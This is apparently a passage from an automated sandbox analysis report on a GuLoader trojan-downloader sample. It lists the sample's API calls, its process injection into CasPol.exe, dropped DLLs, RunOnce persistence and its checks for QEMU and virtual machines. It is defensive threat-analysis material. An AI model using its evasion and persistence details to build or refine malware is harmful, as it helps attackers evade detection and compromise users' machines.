          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251A7E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258844
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03259056
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325585B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032552A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032550AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03255487
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03256682
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325868C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251892
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258CE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032554E7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258AE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258AEC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032560F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325ECFE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032518DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_3_00EDD5B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00B1DE72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00B1E051
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00D666C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00D603C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00F9D1A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00F97AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00F9AA0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00F91D28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01136862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_011364C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01135330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0113AFC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0113EFF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0113B931
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0113BA30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01134AE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_011466A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0114A108
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01146290
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_011466A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01142A28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF95E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF94FF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF946C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF95D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1CF96AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01132B98
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325FB02 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325E349 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325FFD2 NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_00B1DDAE NtCreateThreadEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeVirustotal: Detection: 21%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeJump to behavior
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile created: C:\Users\user\AppData\Local\Temp\nss7448.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/13@2/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile written: C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_713D30C0 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03252B6D push edi; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03252BAA push 00000008h; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03256618 push ebx; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325821B push edi; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03254CAE push esi; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03253A84 push ds; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258A83 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03253C9D push ds; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_3_00EE02B3 pushad ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_3_00EE2ACE push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0113A159 push ebx; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01131051 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile created: C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2936Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251B34 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9943
